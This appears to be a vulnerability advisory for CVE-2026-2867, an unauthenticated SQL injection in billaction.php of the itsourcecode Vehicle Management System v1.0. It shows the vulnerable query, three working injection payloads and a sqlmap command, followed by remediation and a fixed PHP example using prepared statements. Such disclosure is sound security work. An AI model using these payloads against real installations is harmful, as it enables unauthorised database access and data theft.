itsourcecode vehicle-management-system-project V1.0 SQL Injection Vulnerability CVE-2026-2867 #4

@wan1yan

Description

itsourcecode vehicle-management-system-project V1.0 SQL Injection Vulnerability

NAME OF AFFECTED PRODUCT(S):

  • Vehicle Management System Project

Vendor Homepage:

AFFECTED AND/OR FIXED VERSION(S):

  • v1.0

Vuldb Submitter:

  • wanyan

Vulnerable File:

  • ~billaction.php

VERSION(S):

  • v1.0

Vulnerability Type:

  • SQL Injection

SQL Injection Root Cause:

  • The root cause of this vulnerability is unsafe dynamic SQL construction. The program embeds user input from $_GET['id'] and $_POST directly into an SQL statement through string concatenation, without any filtering, escaping, or parameterization.

  • Vulnerable snippet:

```php
$sql="INSERT INTO `tripcost`(`booking_id`,`username`, `total_km`, `oil_cost`, `extra_cost`, `total_cost`) VALUES ('$id','$username','$total_km','$oil_cost','$extra_cost','$total_cost')";
```

DESCRIPTION

The Vehicle Management System Project V1.0 is vulnerable to a critical SQL Injection vulnerability located in the billaction.php file.

The application implements a billing function that records trip costs, but it performs no security validation on user-supplied data. The script reads the id parameter from the GET request and several values (username, total_km, oil_cost, extra_cost, and total_cost) from the POST body. These values are concatenated directly into an INSERT statement without sanitization or parameterized queries.

POC:

```
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1' RLIKE (SELECT (CASE WHEN (3561=3561) THEN 1 ELSE 0x28 END)) AND 'elPB'='elPB

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=1' AND EXTRACTVALUE(5861,CONCAT(0x5c,0x7170706b71,(SELECT (ELT(5861=5861,1))),0x7176716a71)) AND 'AIsC'='AIsC

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4196 FROM (SELECT(SLEEP(5)))IIwM) AND 'lXlt'='lXlt
```

NO AUTHENTICATION REQUIRED

  • Exploitation requires no authentication or prior access to the system.

The following command and screenshots were obtained from testing with the sqlmap tool:

```bash
python3 sqlmap.py -u "http://192.168.1.29:8081/Vehicle-Management/billaction.php?id=1" \
  --data "total_km=11&oil_cost=1&extra_cost=1&total_cost=1&username=test&submit=submit" \
  -p id --batch
```

Remediation

  1. Remediation for SQL Injection: Use Prepared Statements
     Recommendation: Strictly prohibit the construction of SQL queries through string concatenation. Implement prepared statements and parameterized queries using the mysqli or PDO extension.
     Implementation: Use mysqli_prepare() to define the SQL template and mysqli_stmt_bind_param() to bind user-supplied variables.
     Result: User input is treated as literal data rather than executable SQL, which neutralizes the injection.

  2. Remediation for Broken Access Control: Enforce Authentication
     Recommendation: Implement a robust session validation check at the beginning of the billaction.php script.
     Implementation: Verify the existence and validity of the user's session (e.g., $_SESSION['admin_id']). If the session is missing or invalid, the script must terminate immediately with exit() and redirect the user to the login page.
     Result: Unauthenticated attackers can no longer bypass the UI to invoke backend database operations directly.
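The two remediations above, combined in a hardened version of the tripcost INSERT. This is an added example written for this report, not code from the project; it assumes an existing mysqli connection `$conn`, a login page at `login.php`, and a session key `admin_id` set at login (all hypothetical names).

```php
<?php
// Added example, not the project's code. Assumes $conn (mysqli connection),
// login.php, and the session key 'admin_id' set by the login page.
session_start();

// Remediation 2: reject unauthenticated requests before touching the database.
if (empty($_SESSION['admin_id'])) {
    header('Location: login.php');
    exit();
}

// Validate types up front. Validation is defence in depth; the injection fix
// below is the bound parameters, which hold even if validation is loosened.
$id         = filter_input(INPUT_GET,  'id',         FILTER_VALIDATE_INT);
$username   = trim((string)($_POST['username'] ?? ''));
$total_km   = filter_input(INPUT_POST, 'total_km',   FILTER_VALIDATE_FLOAT);
$oil_cost   = filter_input(INPUT_POST, 'oil_cost',   FILTER_VALIDATE_FLOAT);
$extra_cost = filter_input(INPUT_POST, 'extra_cost', FILTER_VALIDATE_FLOAT);
$total_cost = filter_input(INPUT_POST, 'total_cost', FILTER_VALIDATE_FLOAT);

// filter_input() returns null when the field is absent and false when it fails validation.
foreach ([$id, $total_km, $oil_cost, $extra_cost, $total_cost] as $value) {
    if ($value === null || $value === false) {
        http_response_code(400);
        exit('Invalid input');
    }
}
if ($username === '' || strlen($username) > 64) {
    http_response_code(400);
    exit('Invalid username');
}

// Remediation 1: the SQL text contains only placeholders; user data never
// becomes part of the query string, so quotes and operators in it are inert.
$stmt = mysqli_prepare(
    $conn,
    'INSERT INTO `tripcost` (`booking_id`, `username`, `total_km`, `oil_cost`, `extra_cost`, `total_cost`)
     VALUES (?, ?, ?, ?, ?, ?)'
);
if ($stmt === false) {
    http_response_code(500);
    exit('Database error');
}
// Type string: i = integer, s = string, d = double (one character per placeholder).
mysqli_stmt_bind_param($stmt, 'isdddd', $id, $username, $total_km, $oil_cost, $extra_cost, $total_cost);
if (!mysqli_stmt_execute($stmt)) {
    http_response_code(500);
    exit('Database error');
}
mysqli_stmt_close($stmt);
```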
